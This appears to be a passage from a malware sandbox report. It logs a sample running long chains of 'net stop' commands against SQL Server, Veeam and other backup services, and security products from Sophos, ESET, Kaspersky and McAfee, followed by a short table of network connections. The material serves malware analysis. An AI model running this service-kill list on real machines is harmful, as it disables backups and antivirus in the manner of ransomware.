C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

Country  Destination       Domain  Proto
N/A      10.127.0.1:445            tcp
N/A      10.127.0.1:139            tcp
DE       67.24.27.254:80           tcp
DE       67.24.27.254:80           tcp

Files

N/A